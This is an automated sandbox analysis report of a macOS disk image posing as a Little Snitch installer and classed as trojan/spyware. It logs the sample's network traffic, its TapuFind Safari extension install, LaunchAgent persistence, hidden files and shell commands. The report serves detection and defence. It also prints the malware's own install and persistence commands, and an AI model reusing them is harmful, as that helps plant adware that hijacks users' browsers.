Source: global traffic | HTTP traffic detected: GET /?q= HTTP/1.1 | Host: search.tapufind.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Upgrade-Insecure-Requests: 1 | Cookie: co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /js/classList.js?v=6 HTTP/1.1 | Host: search.tapufind.com | Accept: */* | Connection: keep-alive | Cookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Referer: http://search.tapufind.com/?q= | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /Pixel.aspx?name=TapuFind&type=extensioninstalled&browser=false&entity=31&barcode=52413004&userid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c&data1=true HTTP/1.1 | Host: feed.tapufind.com | Accept: */* | Cookie: SmFeedSearchParams=useragentbrowser=safari&u_ip=185.189.150.72&$host=feed.tapufind.com&userid=syn_d955cead-824c-4550-9e89-02e36ed3c263&co=CH; feeduid=syn_d955cead-824c-4550-9e89-02e36ed3c263 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /js/auto-complete.js?v=6 HTTP/1.1 | Host: search.tapufind.com | Accept: */* | Connection: keep-alive | Cookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Referer: http://search.tapufind.com/?q= | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /js/preloadjs-0.6.2.min.js?v=6 HTTP/1.1 | Host: search.tapufind.com | Accept: */* | Connection: keep-alive | Cookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Referer: http://search.tapufind.com/?q= | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /js/main.js?v=6 HTTP/1.1 | Host: search.tapufind.com | Accept: */* | Connection: keep-alive | Cookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Referer: http://search.tapufind.com/?q= | Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /tag?zone_id=58942&size=300x250&pub_keyword=&context=syn_d955cead-824c-4550-9e89-02e36ed3c263&rnd=75329692 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /imp?i=a3Ul5KJ911U_0 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /js/ld/publishertag.js HTTP/1.1Host: static.criteo.netConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /delivery/ajs.php?ptv=63&zoneid=296021&cb=21558021369&nodis=1&charset=UTF-8&dc=3&atfr=1&loc=http%3A%2F%2Fsearch.tapufind.com%2F%3Fq%3D HTTP/1.1Host: cas.criteo.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /tag?zone_id=11521&size=300x250&j=pu%3Dsearch.tapufind.com%26if%3D0%26rn%3D60494450 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /delivery/lg.php?cppv=1&cpp=vjv2WXxBdUJ1d0t1Ty9lVTQxZXFNWUlPQ2FMMllLc3FVM2U0TE1WRXdoa2loWThvbm1KT2tXaStHYXNNUEVkNyt1MWdTcVZGa1U4NHFCWk0xWlJ6a1ByQVRSUURhOHVNaDcvZ0plZ0dSUWlFazlzMVhwc1UwNk9KeGY1WThFSGxjR0E0UlhqRTNtU2luMWg4MFR5cGo5TVowdDI1UXk5dEN2MDdKaXpPN0RyYnIyQStsRzEreXlwNDEwRXBVS3RRVHFqZTh0dG4zS3hpYmJHc0xSSzY1RnJGNURnPT18 HTTP/1.1Host: cat.fr.eu.criteo.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /imp?i=6cy8GQVa6Zc_0 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISA05%2FLr%2B8wuv7zvqr86TvKiUl HTTP/1.1Host: ocsp.int-x3.letsencrypt.orgConnection: closeUser-Agent: trustd (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: install.osxappdownload.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /loadPE/getOffers.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 809
    Expect: 100-continue
    Connection: keep-alive
    Host: 34.225.153.59:10000
Urls found in memory or binary data
Source: setup.dmg | String found in binary or memory: http://bugzilla.xamarin.com
Source: setup.dmg | String found in binary or memory: http://bugzilla.xamarin.com%
Source: setup.dmg | String found in binary or memory: http://bugzilla.xamarin.com%s//%s%s/%sXamarin.Mac:
Source: setup.dmg | String found in binary or memory: http://crl.apple.com/root.crl0
Source: setup.dmg | String found in binary or memory: http://docs.xamarin.com/ios/about/limitations
Source: setup.dmg | String found in binary or memory: http://ios.xamarin.com/Documentation/Limitations#Reverse_Callbacks
Source: setup.dmg | String found in binary or memory: http://ios.xamarin.com/Documentation/Limitations#Reverse_Callbackssig-
Source: setup.dmg | String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdr090
Source: setup.dmg | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: setup.dmg | String found in binary or memory: http://www.apple.com/certificateauthority0
Source: setup.dmg | String found in binary or memory: http://www.gexf.net/1.2draft
Source: setup.dmg | String found in binary or memory: http://www.go-mono.com/mono-downloads/download.html
Source: setup.dmg | String found in binary or memory: http://www.mono-project.com/Diagnostic:Delegate
Source: setup.dmg | String found in binary or memory: http://www.mono-project.com/download.
Source: setup.dmg | String found in binary or memory: https://www.apple.com/appleca/0
Uses HTTPS

System Summary:

Sample file is different than original file name gathered from version info
Source: setup.dmg | Binary or memory string: originalfilename vs setup.dmg
Source: setup.dmg | Binary or memory string: \StringFileInfo\%02X%02X%02X%02X\OriginalFilename vs setup.dmg
Source: setup.dmg | Binary or memory string: UnhandledExceptionEventArgsSTAThreadAttributeargsarg->vtable->klass == mono_defaults.int_classtype 0x%x not handled in mono_runtime_invoke_arraySystem.Runtime.Remoting.ActivationActivationServicesToStringfilenameThis system does not support EnumProcessesProcessModulebaseaddrentryaddrmemory_sizemodulenameversion_infoFileVersionInfo[In Memory] %sfilemajorpartfileminorpartfilebuildpartfileprivatepartproductmajorpartproductminorpartproductbuildpartproductprivatepartisdebugisprereleaseispatchedisprivatebuildisspecialbuild\VarFileInfo\Translationlanguagecomments\StringFileInfo\%02X%02X%02X%02X\Commentscompanyname\StringFileInfo\%02X%02X%02X%02X\CompanyNamefiledescription\StringFileInfo\%02X%02X%02X%02X\FileDescriptionfileversion\StringFileInfo\%02X%02X%02X%02X\FileVersioninternalname\StringFileInfo\%02X%02X%02X%02X\InternalNamelegalcopyright\StringFileInfo\%02X%02X%02X%02X\LegalCopyrightlegaltrademarks\StringFileInfo\%02X%02X%02X%02X\LegalTrademarksoriginalfilename\StringFileInfo\%02X%02X%02X%02X\OriginalFilenamepri
Classification label
Source: classification engine | Classification label: mal88.troj.spyw.evad.macDMG@0/49@46/0

Data Obfuscation:

Imports the IOKit library (often used to register services)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

Attaches disk images with shell command 'hdiutil'
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Hdiutil command executed: /usr/bin/hdiutil attach /Users/henry/Library/X2441139MAC/Temp/mcwnet -nobrowse
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Hdiutil command executed: /usr/bin/hdiutil attach /Users/henry/Library/X2441139MAC/Temp/track_mac.php%3Fcc={GEO}%26clickId={clickId}%26affId={affId}%26transId=3gggkfl1b0pp5pt5sadh -nobrowse
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Hdiutil command executed: /usr/bin/hdiutil attach /Users/henry/Library/X2441139MAC/Temp/chs -nobrowse
Installs Safari extensions
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | Safari extension file moved: /private/tmp/SafariSetter.safariextz -> /Users/henry/Library/Safari/Extensions/TapuFind.safariextz
Writes Mach-O files to untypical directories
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | 64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/Agent/tapufind
Changes permissions of written Mach-O files
Source: /usr/bin/ditto (PID: 673) | Permissions modified for written 64-bit Mach-O /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5Ob: bits: - usr: - grp: - all: rwx
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/Agent/tapufind: bits: - usr: rwx grp: rwx all: rwx
Copies directory hierarchies, creates and/or extracts archives with shell command 'ditto'
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Ditto command executed: /usr/bin/ditto /Volumes/macsearch/ /tmp/
Creates application bundles
Source: /usr/bin/ditto (PID: 673) | Bundle Info.plist file moved: /private/tmp/macsearch.app/Contents/.BC.T_8EnSAw -> /private/tmp/macsearch.app/Contents/Info.plist
Creates hidden files, links and/or directories
Source: /usr/bin/ditto (PID: 673) | Hidden file created: /private/tmp/macsearch.app/Contents/.BC.T_8EnSAw
Source: /usr/bin/ditto (PID: 673) | Hidden file created: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5Ob
Source: /usr/bin/ditto (PID: 673) | Hidden file created: /private/tmp/macsearch.app/Contents/.BC.T_6vxTVo
Source: /usr/bin/ditto (PID: 673) | Hidden file created: /private/tmp/macsearch.app/Contents/Resources/Base.lproj/.BC.T_g27T4p
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /tmp/.dat.nosync02b9.9vvQhe
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /tmp/tapufind/.dat.nosync02b9.o9GXrL
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /tmp/tapufind/.dat.nosync02b9.IwDBz8
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /tmp/tapufind/.dat.nosync02b9.raddFF
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /tmp/tapufind/.dat.nosync02b9.sOJfNr
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70j
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /tmp/tapufind/.dat.nosync02b9.DAOwrT
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Hidden file created: /Users/Shared/.dat.nosync02b9.Mi0YZK
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | Hidden file created: /Users/henry/Library/Safari/Favicon Cache/favicons/.dat.nosync02be.xXJadS
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | Hidden file created: /Users/henry/Library/Safari/Extensions/.dat.nosync02be.9uS08Z
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) | Hidden file created: /Users/Shared/.dat.nosync02c9.zBHRPM
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) | Hidden file created: /Users/henry/Library/Application Support/Agent/.dat.nosync02c9.0oMHxI
Executes commands using a shell command-line interpreter
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Shell command executed: sh -c open -a safari 'http://search.tapufind.com/tpmac.html?_publisher=mcwnet&_barcodeid=52413004&_deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c&_installDate=14-02-2019'
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Shell command executed: sh -c open -a safari /tmp/SafariSetter.safariextz
Explicitly lists launch services possibly for searching
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Launch agent/daemon listed: /bin/launchctl list
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Launch agent/daemon listed: /bin/launchctl list
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Launch agent/daemon listed: /bin/launchctl list
Explicitly loads/starts launch services
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Launch agent/daemon loaded: /bin/launchctl load /Users/henry/Library/LaunchAgents/tapufind.plist
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Launch agent/daemon loaded: /bin/launchctl load /Users/henry/Library/LaunchAgents/tapufind.plist
Opens applications that may be created ones
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Application opened: /usr/bin/open /Volumes/InstallMe/Installer.app
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Application opened: /usr/bin/open /Volumes/Volumes/SetupInstaller/'Click\ Here\ To\ Install.app'
Opens the Safari browser app
Source: /usr/libexec/xpcproxy (PID: 702) | Safari app opened: /Applications/Safari.app/Contents/MacOS/Safari
Reads launchservices plist files
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/system_profiler (PID: 659) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/system_profiler (PID: 661) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 664) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 681) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 692) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 701) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 710) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 722) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /System/Library/CoreServices/ReportCrash (PID: 724) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Source: /tmp/tapufind/ChromeAndFirefoxSetter (PID: 716) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Uses Security framework containing interfaces for system-level user authentication and authorization
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /usr/bin/ditto (PID: 673) | File written: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5Ob
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | File written: /private/tmp/tapufind/.dat.nosync02b9.o9GXrL
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | File written: /Users/henry/Library/Application Support/Agent/tapufind
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | File written: /private/tmp/tapufind/.dat.nosync02b9.raddFF
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | File written: /private/tmp/tapufind/.dat.nosync02b9.DAOwrT
Writes Mach-O files to the tmp directory
Source: /usr/bin/ditto (PID: 673) | 64-bit Mach-O written to tmp path: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5Ob
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | 64-bit Mach-O written to tmp path: /private/tmp/tapufind/.dat.nosync02b9.o9GXrL
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | 64-bit Mach-O written to tmp path: /private/tmp/tapufind/.dat.nosync02b9.raddFF
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | 64-bit Mach-O written to tmp path: /private/tmp/tapufind/.dat.nosync02b9.DAOwrT
Reads data from the local random generator
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674) | Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678) | Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693) | Random device file read: /dev/urandom
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | Random device file read: /dev/urandom
Sample contains user paths that might be useful for attribution
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/domain.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/dynamic-im
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/exception.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/file-mmap-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/gc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/icall.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/icall.c:13
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/image.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/jit-info.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/loader.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/locales.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/marshal.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/metadata-v
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/metadata.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/method-bui
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/monitor.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-basic
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-debug
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-debug
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-hash.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-mlist
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-secur
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/number-ms.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/object.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/profiler.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/rand.c
